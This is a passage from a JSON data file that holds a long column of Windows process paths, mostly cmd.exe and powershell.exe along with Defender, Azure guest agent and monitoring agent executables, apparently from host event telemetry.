C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\"NaN\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\mpam-d3ea18d4.exe\",\"NaN\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"NaN\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"NaN\",\"NaN\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\AM_Delta.exe\",\"NaN\"],\"ParentProcessName\":[\"NaN\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring 